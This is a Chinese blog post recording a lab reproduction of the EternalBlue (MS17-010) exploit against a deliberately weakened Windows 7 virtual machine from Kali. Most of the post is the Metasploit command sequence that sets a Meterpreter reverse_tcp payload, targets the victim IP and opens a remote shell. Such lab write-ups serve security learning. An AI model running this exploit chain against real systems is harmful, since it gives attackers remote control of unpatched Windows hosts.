记一次永恒之蓝漏洞复现(MS17-010)

已于 2023-09-18 19:23:25 修改
阅读量123 收藏
点赞数 1
文章标签: windows 网络安全
于 2023-09-18 18:56:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63030134/article/details/132977893
版权

0x00前期准备工作

所需的虚拟机系统
攻击机 Kali Linux (所在网段:192.168.41.132)
受害机 Windows 7(版本号cn_windows_7_professional_with_sp1_x64_dvd_u_677031)(所在网段:192.168.41.133)
注:读者可在MSDN微软中国获得对应的iso.
两台虚拟机采用NAT模式,保证两台虚拟机在同一网段.

0x01Windows 7配置

将win7系统的防火墙全部关闭,保证其足够的“脆弱”.操作大致如下:控制面板–>系统和安全–>更改防火墙配置–>将下图的两个windows防火墙都关闭.
win7的445端口是打开的(默认).
在这里插入图片描述

0x02利用后渗透工具进行攻击

以下操作均在特权模式下实现,将kali打开输入msfconsole启动metasploit.

msfconsole

在这里插入图片描述
输入search命令搜索永恒之蓝漏洞模块.

search ms17-010

在这里插入图片描述
这里我们使用第二个模块,注意因为我已经做过一次实验了,所以默认采用了payload,若第一次做还应该设置payload.

use 2

在这里插入图片描述
若没有上图的提示,则还需要设置payload
使用 reverse_tcp 类型的攻击载荷时,Metasploit 框架会监听指定的 IP 地址和端口,等待目标系统主动与其建立连接。一旦成功建立连接,Metasploit 将向目标系统发送 Meterpreter shell,并与其建立交互式的远程控制会话.

set payload windows/x64/meterpreter/reverse_tcp

接下来输入show options,查看配置的名称,发现Rhosts(受害机ip)是必填的选项,
在这里插入图片描述
输入set rhosts 192.168.41.133进行设置

set rhosts 192.168.41.133

在这里插入图片描述
在完成以上配置后进行漏洞利用run,看到win说明成功.

run

在这里插入图片描述
我们获取对方电脑shell,为防止乱码,我们再输入chcp 65001命令.

shell
chcp 65001

在这里插入图片描述
输入whoami以及其他命令进行测试.
在这里插入图片描述

0x03finish…

猿动力
关注
永恒之蓝漏洞复现MS17-010
hongji728696的博客
08-29 533
MS17-010永恒之蓝) 2017年爆发的漏洞 存在于windows系统,通过SMB(使用TCP139端口和TCP445端口)协议入侵
复现永恒之蓝漏洞ms17-010)(一)复现
wty923的博客
01-12 315
永恒之蓝漏洞复现
永恒之蓝漏洞复现(ms17-010)
热门推荐
内心不种满鲜花就会长满杂草
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
利用永恒之蓝漏洞(ms17-010)对win7上传勒索病
m0_74402888的博客
04-27 1153
攻击机kali:192.168.83.136靶机win7:192.168.83.144。
永恒之蓝MS17-010漏洞复现
tubug的博客
05-21 7176
2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。5 月 12 日,不法分子通过改造“永恒之蓝”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网呾政府机构与网中招,被勒索支付高额赎金才能解密恢复文件。.........
永恒之蓝 MS17-010漏洞复现
春日野穹
12-21 1885
目录导航 一. 复现环境 二. 漏洞原理 1.漏洞简介 2.漏洞原理代码详解 三. 漏洞复现 1.信息收集 2.漏洞探测 3.漏洞利用 一. 复现环境 工具:msf 攻击机:Kali linux 虚拟机一台 ip: 169.254.93.24 测试机:Windows 2008 r2 虚拟机一台 ip: 169.254.93.243 网络环境:手机WiFi网络USB共享,同一局域网,桥接网络模...
ms17-010永恒之蓝漏洞复现
Filotimo_的博客
09-09 2995
ms17-010永恒之蓝)利用的端口是445端口。本文主要讲解ms17-010永恒之蓝漏洞复现
永恒之蓝漏洞原理/永恒之蓝 MS17-010漏洞复现_零基础渗透指南
程序员三九的博客
06-25 754
利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限,是一种使用MSF 实现 “永恒之蓝”的快速攻击。
一次ms17-010(永恒之蓝)漏洞复现
weixin_47830774的博客
05-13 1482
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
ms17-010永恒之蓝漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
漏洞复现 | MS17-010*(永恒之蓝漏洞复现
made_cola的博客
03-24 2591
永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
使用Kali复现永恒之蓝漏洞ms17-010
m0_67463450的博客
01-15 1012
永恒之蓝漏洞ms17-010)的简单复现
复现永恒之蓝漏洞ms17-010)操作配截图
qq_62673514的博客
01-10 246
复现永恒之蓝
复现永恒之蓝漏洞ms17-010),操作配截图
m0_63113545的博客
01-14 110
主要讲述了永恒之蓝漏洞复现
漏洞复现-永恒之蓝MS17-010
qq_60848021的博客
09-19 3073
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
面向对象编程 vs 函数式编程
weixin_48191864的博客
11-10 973
面向对象编程(OOP)和函数式编程(FP)的核心概念与差异。通过实现Todo List的实例,对比两种编程范式的特点、优势和适用场景,帮助开发者选择最适合的编程方式,提升代码质量。
Windows】CMD命令学习——系统命令
一个写了10年bug的程序员日常笔记。
11-07 1402
CMD(命令提示符)是Windows操作系统中的一个命令行解释器,允许用户通过输入命令来执行各种系统操作。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8546
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
数据库基础测验20241113.doc
最新发布
11-13
数据库基础测验20241113.doc
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

猿动力

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值